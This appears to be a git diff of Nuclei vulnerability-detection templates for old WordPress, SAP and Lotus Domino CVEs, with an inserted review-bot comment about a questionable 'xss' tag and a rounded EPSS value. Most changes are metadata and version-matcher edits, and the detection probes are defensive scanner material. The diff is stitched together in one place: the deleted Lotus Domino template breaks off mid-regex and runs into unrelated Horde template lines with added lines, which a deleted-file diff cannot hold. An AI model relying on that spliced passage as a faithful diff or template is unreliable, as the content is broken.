reference: - - http://secunia.com/advisories/16386 - - https://wordpress.org/news/2005/08/one-five-two/ - - https://web.archive.org/web/20110101141011/http%3A//archives.neohapsis.com%3A80/archives/fulldisclosure/2005-08/0234.html + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fbe42214-0a01-4b9c-8149-68c47082d9d9?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/nuclei-templates/CVE-2005/CVE-2005-3634.yaml b/nuclei-templates/CVE-2005/CVE-2005-3634.yaml index f97265581d..4488b0a43c 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-3634.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-3634.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability. reference: - https://www.exploit-db.com/exploits/26488 - https://cxsecurity.com/issue/WLB-2005110025 @@ -19,14 +23,14 @@ info: cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other epss-score: 0.02843 + epss-percentile: 0.897 cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* - epss-percentile: 0.89376 metadata: max-request: 1 - shodan-query: html:"SAP Business Server Pages Team" vendor: sap product: sap_web_application_server - tags: cve,cve2005,sap,redirect,business + shodan-query: html:"SAP Business Server Pages Team" + tags: cve,cve2005,sap,redirect,business,xss http: - method: GET 
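Review bot: The second hunk of CVE-2005-3634.yaml adds `xss` to `tags: cve,cve2005,sap,redirect,business,xss`, but nothing in the template describes script injection: the description is an open redirect through `sap-exiturl`, the classification keeps `cwe-id: NVD-CWE-Other`, and the matcher in the following hunk is a `Location`-header regex for an interact.sh host. Unless the source this was synced from classifies the issue as XSS, the tag should be dropped so tag-filtered runs do not pull an open-redirect check in as XSS. Worth a look in the same hunk: `epss-percentile` changes from `0.89376` to `0.897` while being moved above `cpe`; fine if it came from a fresh EPSS pull, but check it was not hand-rounded. The `info:` block edited here starts outside the hunk.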
@@ -38,3 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' +# digest: 4b0a004830460221009b702e9a18c644f2a8ddd637cd2d87e35e59ec9159e4726e5b9dbf6cbe27ddcc022100e7fd499cc594ceab440e9188af24fd6eaa6f1eab4514609586796ae41b96b43f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2005/CVE-2005-4463.yaml b/nuclei-templates/CVE-2005/CVE-2005-4463.yaml index b246eaf446..fc283b4f84 100644 --- a/nuclei-templates/CVE-2005/CVE-2005-4463.yaml +++ b/nuclei-templates/CVE-2005/CVE-2005-4463.yaml 
@@ -1,13 +1,14 @@ id: CVE-2005-4463 info: - name: "WordPress Core < 1.5.2 - Full Path Disclosure" + name: > + WordPress Core < 1.5.2 - Full Path Disclosure author: topscoder severity: medium - description: "WordPress before 1.5.2 allows remote attackers to obtain sensitive information via a direct request to (1) wp-includes/vars.php, (2) wp-content/plugins/hello.php, (3) wp-admin/upgrade-functions.php, (4) wp-admin/edit-form.php, (5) wp-settings.php, and (6) wp-admin/edit-form-comment.php, which leaks the path in an error message related to undefined functions or failed includes. NOTE: the wp-admin/menu-header.php vector is already covered by CVE-2005-2110. NOTE: the vars.php, edit-form.php, wp-settings.php, and edit-form-comment.php vectors were also reported to affect WordPress 2.0.1." + description: > + WordPress before 1.5.2 allows remote attackers to obtain sensitive information via a direct request to (1) wp-includes/vars.php, (2) wp-content/plugins/hello.php, (3) wp-admin/upgrade-functions.php, (4) wp-admin/edit-form.php, (5) wp-settings.php, and (6) wp-admin/edit-form-comment.php, which leaks the path in an error message related to undefined functions or failed includes. NOTE: the wp-admin/menu-header.php vector is already covered by CVE-2005-2110. NOTE: the vars.php, edit-form.php, wp-settings.php, and edit-form-comment.php vectors were also reported to affect WordPress 2.0.1. reference: - - http://securityreason.com/securityalert/286 - - https://wordpress.org/news/2005/08/one-five-two/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5bfd1650-0cc1-4b1c-9fc2-c940d841a147?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 
@@ -31,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 1.5.2') - - compare_versions(version_by_js, '< 1.5.2') - - compare_versions(version_by_css, '< 1.5.2') + - compare_versions(version_by_generator, '<= 1.5.2') + - compare_versions(version_by_js, '<= 1.5.2') + - compare_versions(version_by_css, '<= 1.5.2') - type: status status: diff --git a/nuclei-templates/CVE-2005/cve-2005-2428.yaml b/nuclei-templates/CVE-2005/cve-2005-2428.yaml deleted file mode 100644 index 061af2a832..0000000000 --- a/nuclei-templates/CVE-2005/cve-2005-2428.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2005-2428 -info: - name: CVE-2005-2428 - author: CasperGN - severity: medium - tags: cve,cve2005 - description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696. - reference: - - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - - https://www.exploit-db.com/exploits/39495 - -requests: - - method: GET - path: - - "{{BaseURL}}/names.nsf/People?OpenView" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - name: domino-username - regex: - - '(Horde :: User Administration" - condition: and - type: status status: - 200 - -# Enhanced by mp on 2022/03/18 +# digest: 490a0046304402200f6ab7e5b811ae50b7feb5a05fd7996c735219dbe8a152b9c4cfd263af7405d6022054184a20298d9717f3c6263e0ca1083caa2941df71af109b0f69013ab683cec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2005/CVE-2005-4385.yaml b/nuclei-templates/CVE-2005/cve-2005-4385.yaml similarity index 100% rename from nuclei-templates/CVE-2005/CVE-2005-4385.yaml rename to nuclei-templates/CVE-2005/cve-2005-4385.yaml diff --git a/nuclei-templates/CVE-2006/CVE-2006-0985.yaml b/nuclei-templates/CVE-2006/CVE-2006-0985.yaml index 6e98b2d993..bd90bccaf5 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-0985.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-0985.yaml @@ -1,19 +1,14 @@ id: CVE-2006-0985 info: - name: "WordPress Core <= 2.0.1 - Cross-Site Scripting" + name: > + WordPress Core <= 2.0.1 - Cross-Site Scripting author: topscoder severity: high - description: "Multiple cross-site scripting (XSS) vulnerabilities in the 'post comment' functionality of WordPress 2.0.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) website, and (3) comment parameters." + description: > + Multiple cross-site scripting (XSS) vulnerabilities in the "post comment" functionality of WordPress 2.0.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) website, and (3) comment parameters. reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/24957 - - http://NeoSecurityTeam.net/advisories/Advisory-17.txt - - http://secunia.com/advisories/19050 - - http://www.securityfocus.com/archive/1/426304/100/0/threaded - - http://www.vupen.com/english/advisories/2006/0777 - - http://www.securityfocus.com/archive/1/426574/100/0/threaded - - http://www.securityfocus.com/archive/1/426504/100/0/threaded - - https://wordpress.org/news/2006/03/security-202/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dab0ddfb-6e30-4bde-95fb-90570579ff04?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 
diff --git a/nuclei-templates/CVE-2006/CVE-2006-0986.yaml b/nuclei-templates/CVE-2006/CVE-2006-0986.yaml index d909201cfe..9c27eff2a8 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-0986.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-0986.yaml 
@@ -1,18 +1,14 @@ id: CVE-2006-0986 info: - name: "WordPress Core < 2.0.2 - Sensitive Information Disclosure" + name: > + WordPress Core < 2.0.2 - Sensitive Information Disclosure author: topscoder severity: high - description: "WordPress 2.0.1 and earlier allows remote attackers to obtain sensitive information via a direct request to (1) default-filters.php, (2) template-loader.php, (3) rss-functions.php, (4) locale.php, (5) wp-db.php, and (6) kses.php in the wp-includes/ directory; and (7) edit-form-advanced.php, (8) admin-functions.php, (9) edit-link-form.php, (10) edit-page-form.php, (11) admin-footer.php, and (12) menu.php in the wp-admin directory; and possibly (13) list directory contents of the wp-includes directory. NOTE: the vars.php, edit-form.php, wp-settings.php, and edit-form-comment.php vectors are already covered by CVE-2005-4463. The menu-header.php vector is already covered by CVE-2005-2110. Other vectors might be covered by CVE-2005-1688. NOTE: if the typical installation of WordPress does not list any site-specific files to wp-includes, then vector [13] is not an exposure." + description: > + WordPress 2.0.1 and earlier allows remote attackers to obtain sensitive information via a direct request to (1) default-filters.php, (2) template-loader.php, (3) rss-functions.php, (4) locale.php, (5) wp-db.php, and (6) kses.php in the wp-includes/ directory; and (7) edit-form-advanced.php, (8) admin-functions.php, (9) edit-link-form.php, (10) edit-page-form.php, (11) admin-footer.php, and (12) menu.php in the wp-admin directory; and possibly (13) list directory contents of the wp-includes directory. NOTE: the vars.php, edit-form.php, wp-settings.php, and edit-form-comment.php vectors are already covered by CVE-2005-4463. The menu-header.php vector is already covered by CVE-2005-2110. Other vectors might be covered by CVE-2005-1688. 
NOTE: if the typical installation of WordPress does not list any site-specific files to wp-includes, then vector [13] is not an exposure. reference: - - http://NeoSecurityTeam.net/advisories/Advisory-17.txt - - http://secunia.com/advisories/19050 - - http://www.securityfocus.com/archive/1/426304/100/0/threaded - - http://www.vupen.com/english/advisories/2006/0777 - - http://www.securityfocus.com/archive/1/426574/100/0/threaded - - http://www.securityfocus.com/archive/1/426504/100/0/threaded - - https://wordpress.org/news/2006/03/security-202/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/06e4d7e3-c800-4b3d-9504-c69aa9a918fb?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 diff --git a/nuclei-templates/CVE-2006/CVE-2006-1012.yaml b/nuclei-templates/CVE-2006/CVE-2006-1012.yaml index 5a27db212e..f0b05283a2 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-1012.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-1012.yaml 
@@ -1,17 +1,14 @@ id: CVE-2006-1012 info: - name: "WordPress Core <= 1.5.2 - SQL Injection" + name: > + WordPress Core <= 1.5.2 - SQL Injection author: topscoder severity: high - description: "SQL injection vulnerability in WordPress 1.5.2, and possibly other versions before 2.0, allows remote attackers to execute arbitrary SQL commands via the User-Agent field in an HTTP header for a comment." + description: > + SQL injection vulnerability in WordPress 1.5.2, and possibly other versions before 2.0, allows remote attackers to execute arbitrary SQL commands via the User-Agent field in an HTTP header for a comment. reference: - - http://www.securityfocus.com/bid/16950 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/25321 - - http://www.gentoo.org/security/en/glsa/glsa-200603-01.xml - - http://secunia.com/advisories/19123 - - http://secunia.com/advisories/19109 - - https://wordpress.org/news/2005/12/wp2/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8ba30cbb-7a20-47aa-bbd6-82fdb27d4705?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 diff --git a/nuclei-templates/CVE-2006/CVE-2006-1263.yaml b/nuclei-templates/CVE-2006/CVE-2006-1263.yaml index d94a55fcb4..cabda3faea 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-1263.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-1263.yaml 
@@ -1,13 +1,14 @@ id: CVE-2006-1263 info: - name: "WordPress Core < 2.0.2 - Reflected Cross-Site Scripting" + name: > + WordPress Core < 2.0.2 - Reflected Cross-Site Scripting author: topscoder severity: medium - description: "Multiple 'unannounced' cross-site scripting (XSS) vulnerabilities in WordPress before 2.0.2 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors." + description: > + Multiple "unannounced" cross-site scripting (XSS) vulnerabilities in WordPress before 2.0.2 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors. reference: - - http://wordpress.org/development/2006/03/security-202/ - - https://www.tenable.com/plugins/nessus/125680 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c8313827-f3ce-451d-869a-99684f58daff?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -31,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 2.0.2') - - compare_versions(version_by_js, '< 2.0.2') - - compare_versions(version_by_css, '< 2.0.2') + - compare_versions(version_by_generator, '<= 2.0.2') + - compare_versions(version_by_js, '<= 2.0.2') + - compare_versions(version_by_css, '<= 2.0.2') - type: status status: diff --git a/nuclei-templates/CVE-2006/cve-2006-1681.yaml b/nuclei-templates/CVE-2006/CVE-2006-1681.yaml similarity index 100% rename from nuclei-templates/CVE-2006/cve-2006-1681.yaml rename to nuclei-templates/CVE-2006/CVE-2006-1681.yaml diff --git a/nuclei-templates/CVE-2006/CVE-2006-1796.yaml b/nuclei-templates/CVE-2006/CVE-2006-1796.yaml index b0a9a1d3cb..0bd35c7234 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-1796.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-1796.yaml 
@@ -1,14 +1,14 @@ id: CVE-2006-1796 info: - name: "WordPress Core < 2.0.1 - Cross-Site Scripting" + name: > + WordPress Core < 2.0.1 - Cross-Site Scripting author: topscoder severity: medium - description: "Cross-site scripting (XSS) vulnerability in the paging links functionality in template-functions-links.php in Wordpress 1.5.2, and possibly other versions before 2.0.1, allows remote attackers to inject arbitrary web script or HTML to Internet Explorer users via the request URI ($_SERVER['REQUEST_URI'])." + description: > + Cross-site scripting (XSS) vulnerability in the paging links functionality in template-functions-links.php in Wordpress 1.5.2, and possibly other versions before 2.0.1, allows remote attackers to inject arbitrary web script or HTML to Internet Explorer users via the request URI ($_SERVER['REQUEST_URI']). reference: - - http://trac.wordpress.org/ticket/1686 - - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=328909 - - https://wordpress.org/news/2006/01/201-release/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8d874540-dced-420d-81c0-46c185df10f1?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 diff --git a/nuclei-templates/CVE-2006/CVE-2006-2667.yaml b/nuclei-templates/CVE-2006/CVE-2006-2667.yaml index 018556cc24..ae6665d865 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-2667.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-2667.yaml 
@@ -1,21 +1,14 @@ id: CVE-2006-2667 info: - name: "WordPress Core < 2.0.3 - Remote Code Execution" + name: > + WordPress Core < 2.0.3 - Remote Code Execution author: topscoder severity: high - description: "Direct static code injection vulnerability in WordPress 2.0.2 and earlier allows remote attackers to execute arbitrary commands by inserting a carriage return and PHP code when updating a profile, which is appended after a special comment sequence into files in (1) wp-content/cache/userlogins/ (2) wp-content/cache/users/ which are later included by cache.php, as demonstrated using the displayname argument." + description: > + Direct static code injection vulnerability in WordPress 2.0.2 and earlier allows remote attackers to execute arbitrary commands by inserting a carriage return and PHP code when updating a profile, which is appended after a special comment sequence into files in (1) wp-content/cache/userlogins/ (2) wp-content/cache/users/ which are later included by cache.php, as demonstrated using the displayname argument. reference: - - http://secunia.com/advisories/20271 - - http://www.osvdb.org/25777 - - http://www.vupen.com/english/advisories/2006/1992 - - http://secunia.com/advisories/20608 - - http://www.gentoo.org/security/en/glsa/glsa-200606-08.xml - - http://www.securityfocus.com/bid/18372 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/26687 - - http://retrogod.altervista.org/wordpress_202_xpl.html - - http://www.securityfocus.com/archive/1/435039/100/0/threaded - - https://wordpress.org/news/2006/06/wordpress-203/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cc0d15ab-e0a4-4ac5-8558-23aeaf00b11a?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/nuclei-templates/CVE-2006/CVE-2006-2702.yaml b/nuclei-templates/CVE-2006/CVE-2006-2702.yaml index fc550503b2..39fdda8baf 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-2702.yaml 
+++ b/nuclei-templates/CVE-2006/CVE-2006-2702.yaml @@ -1,20 +1,14 @@ id: CVE-2006-2702 info: - name: "WordPress Core < 2.0.3 - IP Address Spoofing" + name: > + WordPress Core < 2.0.3 - IP Address Spoofing author: topscoder severity: medium - description: "vars.php in WordPress 2.0.2, possibly when running on Mac OS X, allows remote attackers to spoof their IP address via a PC_REMOTE_ADDR HTTP header, which vars.php uses to redefine $_SERVER['REMOTE_ADDR']." + description: > + vars.php in WordPress 2.0.2, possibly when running on Mac OS X, allows remote attackers to spoof their IP address via a PC_REMOTE_ADDR HTTP header, which vars.php uses to redefine $_SERVER['REMOTE_ADDR']. reference: - - http://secunia.com/advisories/20271 - - http://www.vupen.com/english/advisories/2006/1992 - - http://www.osvdb.org/25935 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/26688 - - http://secunia.com/advisories/20608 - - http://www.gentoo.org/security/en/glsa/glsa-200606-08.xml - - http://retrogod.altervista.org/wordpress_202_xpl.html - - http://www.securityfocus.com/archive/1/435039/100/0/threaded - - https://wordpress.org/news/2006/06/wordpress-203/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/71b521b5-acb5-4439-90f8-7d341291d583?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2006/CVE-2006-3390.yaml b/nuclei-templates/CVE-2006/CVE-2006-3390.yaml index 33735ea12b..6b628361e5 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-3390.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-3390.yaml 
@@ -1,20 +1,14 @@ id: CVE-2006-3390 info: - name: "WordPress Core < 2.0.4 - Full Path Disclosure" + name: > + WordPress Core < 2.0.4 - Full Path Disclosure author: topscoder severity: medium - description: "WordPress 2.0.3 allows remote attackers to obtain the installation path via a direct request to various files, such as those in the (1) wp-admin, (2) wp-content, and (3) wp-includes directories, possibly due to uninitialized variables." + description: > + WordPress 2.0.3 allows remote attackers to obtain the installation path via a direct request to various files, such as those in the (1) wp-admin, (2) wp-content, and (3) wp-includes directories, possibly due to uninitialized variables. reference: - - http://securityreason.com/securityalert/1187 - - http://secunia.com/advisories/20928 - - http://secunia.com/advisories/21447 - - http://www.securityfocus.com/bid/18779 - - http://www.securityfocus.com/archive/1/439062/100/0/threaded - - http://security.gentoo.org/glsa/glsa-200608-19.xml - - http://www.vupen.com/english/advisories/2006/2661 - - http://www.securityfocus.com/archive/1/438942/100/0/threaded - - https://wordpress.org/news/2006/07/wordpress-204/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/159b5565-f4d8-4514-9397-20b6a0890475?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2006/CVE-2006-4028.yaml b/nuclei-templates/CVE-2006/CVE-2006-4028.yaml index 6a58bc6ef8..1dff38a878 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-4028.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-4028.yaml 
@@ -1,14 +1,14 @@ id: CVE-2006-4028 info: - name: "WordPress Core < 2.0.4 - Privilege Escalation" + name: > + WordPress Core < 2.0.4 - Privilege Escalation author: topscoder severity: critical - description: "Multiple unspecified vulnerabilities in WordPress before 2.0.4 have unknown impact and remote attack vectors. NOTE: due to lack of details, it is not clear how these issues are different from CVE-2006-3389 and CVE-2006-3390, although it is likely that 2.0.4 addresses an unspecified issue related to 'Anyone can register' functionality (user registration for guests)." + description: > + Multiple unspecified vulnerabilities in WordPress before 2.0.4 have unknown impact and remote attack vectors. NOTE: due to lack of details, it is not clear how these issues are different from CVE-2006-3389 and CVE-2006-3390, although it is likely that 2.0.4 addresses an unspecified issue related to "Anyone can register" functionality (user registration for guests). reference: - - http://wordpress.org/development/2006/07/wordpress-204/ - - http://unknowngenius.com/blog/archives/2006/07/27/followup-on-wordpress/ - - http://unknowngenius.com/blog/archives/2006/07/26/critical-announcement-to-all-wordpress-users/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab6e751-dc23-442f-b22e-ee41fd6651f6?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -32,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 2.0.4') - - compare_versions(version_by_js, '< 2.0.4') - - compare_versions(version_by_css, '< 2.0.4') + - compare_versions(version_by_generator, '<= 2.0.4') + - compare_versions(version_by_js, '<= 2.0.4') + - compare_versions(version_by_css, '<= 2.0.4') - type: status status: diff --git a/nuclei-templates/CVE-2006/CVE-2006-4208.yaml b/nuclei-templates/CVE-2006/CVE-2006-4208.yaml index 02de78b64f..02ce605fab 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-4208.yaml 
+++ b/nuclei-templates/CVE-2006/CVE-2006-4208.yaml @@ -1,19 +1,14 @@ id: CVE-2006-4208 info: - name: "Skippy WP-DB Backup (Legacy Plugin) <= 1.7 - Authenticated (Admin+) Directory Traversal" + name: > + Skippy WP-DB Backup (Legacy Plugin) <= 1.7 - Authenticated (Admin+) Directory Traversal author: topscoder severity: medium - description: "Directory traversal vulnerability in wp-db-backup.php in the Skippy WP-DB-Backup legacy plugin for WordPress 1.7 and earlier allows remote authenticated users with administrative privileges to read arbitrary files via a .. (dot dot) in the backup parameter to edit.php." + description: > + Directory traversal vulnerability in wp-db-backup.php in the Skippy WP-DB-Backup legacy plugin for WordPress 1.7 and earlier allows remote authenticated users with administrative privileges to read arbitrary files via a .. (dot dot) in the backup parameter to edit.php. reference: - - http://secunia.com/advisories/21486 - - http://trac.wordpress.org/changeset/4095 - - http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/ - - https://exchange.xforce.ibmcloud.com/vulnerabilities/28375 - - http://www.securityfocus.com/bid/19504 - - http://securityreason.com/securityalert/1401 - - http://www.securityfocus.com/archive/1/443181/100/0/threaded - - http://www.vupen.com/english/advisories/2006/3280 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e38b567-9567-4b08-8fab-3971547394b0?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N cvss-score: 5.5 diff --git a/nuclei-templates/CVE-2006/CVE-2006-4743.yaml b/nuclei-templates/CVE-2006/CVE-2006-4743.yaml index 3a0b3da95a..c6397bf9b8 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-4743.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-4743.yaml 
@@ -1,16 +1,14 @@ id: CVE-2006-4743 info: - name: "WordPress Core 2.0.2 - 2.0.5 - Sensitive Information Disclosure" + name: > + WordPress Core 2.0.2 - 2.0.5 - Sensitive Information Disclosure author: topscoder severity: medium - description: "WordPress 2.0.2 through 2.0.5 allows remote attackers to obtain sensitive information via a direct request for (1) 404.php, (2) akismet.php, (3) archive.php, (4) archives.php, (5) attachment.php, (6) blogger.php, (7) comments.php, (8) comments-popup.php, (9) dotclear.php, (10) footer.php, (11) functions.php, (12) header.php, (13) hello.php, (14) wp-content/themes/default/index.php, (15) links.php, (16) livejournal.php, (17) mt.php, (18) page.php, (19) rss.php, (20) searchform.php, (21) search.php, (22) sidebar.php, (23) single.php, (24) textpattern.php, (25) upgrade-functions.php, (26) upgrade-schema.php, or (27) wp-db-backup.php, which reveal the path in various error messages. NOTE: another researcher has disputed the details of this report, stating that version 2.0.5 does not exist. NOTE: the admin-footer.php, admin-functions.php, default-filters.php, edit-form-advanced.php, edit-link-form.php, edit-page-form.php, kses.php, locale.php, rss-functions.php, template-loader.php, and wp-db.php vectors are already covered by CVE-2006-0986. The edit-form-comment.php, vars.php, and wp-settings.php vectors are already covered by CVE-2005-4463. The menu-header.php vector is already covered by CVE-2005-2110." 
+ description: > + WordPress 2.0.2 through 2.0.5 allows remote attackers to obtain sensitive information via a direct request for (1) 404.php, (2) akismet.php, (3) archive.php, (4) archives.php, (5) attachment.php, (6) blogger.php, (7) comments.php, (8) comments-popup.php, (9) dotclear.php, (10) footer.php, (11) functions.php, (12) header.php, (13) hello.php, (14) wp-content/themes/default/index.php, (15) links.php, (16) livejournal.php, (17) mt.php, (18) page.php, (19) rss.php, (20) searchform.php, (21) search.php, (22) sidebar.php, (23) single.php, (24) textpattern.php, (25) upgrade-functions.php, (26) upgrade-schema.php, or (27) wp-db-backup.php, which reveal the path in various error messages. NOTE: another researcher has disputed the details of this report, stating that version 2.0.5 does not exist. NOTE: the admin-footer.php, admin-functions.php, default-filters.php, edit-form-advanced.php, edit-link-form.php, edit-page-form.php, kses.php, locale.php, rss-functions.php, template-loader.php, and wp-db.php vectors are already covered by CVE-2006-0986. The edit-form-comment.php, vars.php, and wp-settings.php vectors are already covered by CVE-2005-4463. The menu-header.php vector is already covered by CVE-2005-2110. reference: - - http://www.securityfocus.com/archive/1/445374/100/0/threaded - - http://www.securityfocus.com/archive/1/445471/100/0/threaded - - http://www.securityfocus.com/archive/1/445711/100/0/threaded - - http://www.securityfocus.com/archive/1/445604/100/0/threaded - - https://wordpress.org/news/2007/01/wordpress-206/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f50bca0a-7089-4b4e-820f-d311fdb88cf1?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2006/CVE-2006-5705.yaml b/nuclei-templates/CVE-2006/CVE-2006-5705.yaml index 3d36043f75..0b389cc63b 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-5705.yaml 
+++ b/nuclei-templates/CVE-2006/CVE-2006-5705.yaml @@ -1,22 +1,14 @@ id: CVE-2006-5705 info: - name: "WordPress Core <= 2.0.4 - Directory Traversal" + name: > + WordPress Core <= 2.0.4 - Directory Traversal author: topscoder severity: medium - description: "Multiple directory traversal vulnerabilities in plugins/wp-db-backup.php in WordPress before 2.0.5 allow remote authenticated users to read or overwrite arbitrary files via directory traversal sequences in the (1) backup and (2) fragment parameters in a GET request." + description: > + Multiple directory traversal vulnerabilities in plugins/wp-db-backup.php in WordPress before 2.0.5 allow remote authenticated users to read or overwrite arbitrary files via directory traversal sequences in the (1) backup and (2) fragment parameters in a GET request. reference: - - http://markjaquith.wordpress.com/2006/10/17/changes-in-wordpress-205/ - - http://wordpress.org/development/2006/10/205-ronan/ - - http://www.gentoo.org/security/en/glsa/glsa-200611-10.xml - - http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.027-wordpress.html - - http://secunia.com/advisories/22942 - - http://www.securityfocus.com/bid/20869 - - http://secunia.com/advisories/22683 - - http://trac.wordpress.org/changeset/4226 - - http://bugs.gentoo.org/show_bug.cgi?id=153303 - - http://www.vupen.com/english/advisories/2006/4307 - - https://wordpress.org/news/2006/10/205-ronan/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/83ec5fa5-2fd9-4c7d-a2f1-de885746d2d3?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 diff --git a/nuclei-templates/CVE-2006/CVE-2006-6016.yaml b/nuclei-templates/CVE-2006/CVE-2006-6016.yaml index b2fc60ba9b..215afd28e5 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-6016.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-6016.yaml 
